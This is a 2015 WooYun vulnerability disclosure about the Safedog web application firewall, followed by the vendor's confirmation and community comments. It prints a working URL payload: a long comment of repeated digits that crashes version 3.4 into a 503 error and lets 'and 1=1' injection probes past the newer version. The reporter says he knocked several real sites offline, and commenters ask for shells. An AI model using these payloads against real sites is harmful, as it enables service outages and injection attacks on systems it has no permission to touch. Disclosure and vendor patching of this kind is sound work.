缺陷编号:WooYun-2015-0129611
漏洞标题:安全狗拒绝服务/注入绕过(可导致大量网站拒绝服务)
相关厂商:安全狗
漏洞作者:range
提交时间:2015-07-27 10:15
公开时间:2015-10-26 16:16
漏洞类型:拒绝服务
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
2015-07-27: 细节已通知厂商并且等待厂商处理中
2015-07-28: 厂商已经确认,细节仅向厂商公开
2015-07-31: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开
恨他就让他装个安全狗吧。
1.拒绝服务安全狗的某个版本在处理参数的时候处理不当,导致网站503拒绝服务。另外,该版本应该很常见吧,一共打了15个有狗的站,只有3个打不掉在url中加入如下参数即可:
1 |
a=/*66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666*/& |
然后。。。该站就直接503了虽然安全狗已经推出了最新版,并防止了该程序的崩溃这是在
但是。。。这服务器上的升级程序是怎么回事?
最好强制升级!2.注入绕过(对于升级后的安全狗)本地刚刚下载了个安全狗,肯定是最新的,同样是上面的payload,421个以上的a,最新版的可以bypass掉对‘and’的过滤,但至少421个6,少了就被拦截。虽然只可以绕过"and"关键字,但是已经可以测试该网址是否存在注入了,详情见证明中的视频,如果还握有其他bypass,还也可以进一步利用。被拦截:
1 |
http://**.**.**.**/company_/post.aspx?threadid=14669&action=reply&page=1%20and%201=1 and 1=1 |
放过:
1 |
http://**.**.**.**/company_/post.aspx?a=/*66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666*/&threadid=14669&action=reply&page=1%20and%201=1 and 1=1 |
所以一共是两种情况,要么被挂掉,要么被绕过。
http://**.**.**.**/**.**.**.**/这是个安装了该版本的安全狗的服务器,几乎所有网站都可以被挂掉,其他例子太多了,已经D成功的还有韵达美国官网,艾慕网等视频地址:http://**.**.**.**/programs/view/SVUiRKopaTs/密码1234第二个视频被土豆屏蔽了,只能放百度云。地址:http://**.**.**.**/s/1o6JyH42密码:yn9q
重新过滤,强制升级
危害等级:高
漏洞Rank:12
确认时间:2015-07-2816:14
感谢提交,周一就看到了,到今天才确认是因为这边需要测试,然后也是让研发赶快发个“从3.4升级到3.5”的“补!丁!包!”给3.4版本的用户。需要说明的是,该漏洞只影响3.4版本,最新的3.5版本是不受影响的,请广大站长放心。考虑到还有好多用户在用3.4版本的安全狗,所以这次的影响认定为“高”。最后,欢迎白帽子对最新的3.5版进行测试,我们将公正的进行裁定,对安全狗做出重大贡献的白帽子,我们是不会忘记你们的。最后的最后,本次的补丁将自(强)动(行)下(升)发(级),将版本提至3.5,请广大站长放心!
暂无
so屌!!
恨他就让他装个安全狗吧
恨他就让他装个安全狗吧
恨他就让他装个安全狗吧
mark!!!
果然是下面牛!!
为啥匿名?
反噬神技!
@range
求个shell
@Me_Fortune 略屌
啥都不说了,下午买包烟带上来!
下面牛就是牛。
/呲牙 坐等安全狗
mark!!!
终于出来杀狗的了!叫你装狗!!!
牛逼
吓的我赶紧把狗卸载掉了,卧槽 吓死我了
恨他就让他装个安全狗吧
@xsser 求审核http://www.wooyun.org/bugs/wooyun-2015-0129426/trace/696b089fc73877870e8fdc8f8034ca61
你是怎么做到的亲!
坐等5rank
杀狗牛
求shell
貌似之前看到过?
坐等公布
爱他就让他装个安全狗吧。
请客吃饭!!!
汪汪汪
终于有杀狗的了!!!
围观大牛,哈哈
@range
@乌云合作伙伴-绿盟 我去,你怎么知道。
@乌云合作伙伴-绿盟 我都不知道是谁,这你都知道?
@乌云合作伙伴-绿盟 这货到处装逼啊。。哈哈
这个不会忘记你们的……听起来慎得慌
@幻老头儿 放心,我们不咬人!
....
要紧
1000到手~
@背影 一万
某主机卫士是不是更靠谱一些
就是叼
@半块西瓜皮 我擦,西瓜牛都出来了
对安全狗做出重大贡献的白帽子,我们是不会忘记你们的。
对安全狗做出重大贡献的白帽子,我们是不会忘记你们的。
@range 就为了评论你 我都注册乌云了! 哈哈哈~ 膜拜~~
@ifk 66666
对安全狗做出重大贡献的白帽子,我们是不会忘记你们的。
对安全狗做出重大贡献的白帽子,我们是不会忘记你们的。
对安全狗做出重大贡献的白帽子,我们是不会忘记你们的。
恨他就让他装个安全狗吧
有技术含量
对安全狗做出重大贡献的白帽子,我们是不会忘记你们的。
666666666666666666
原文连接
的情况下转载,若非则不得使用我方内容。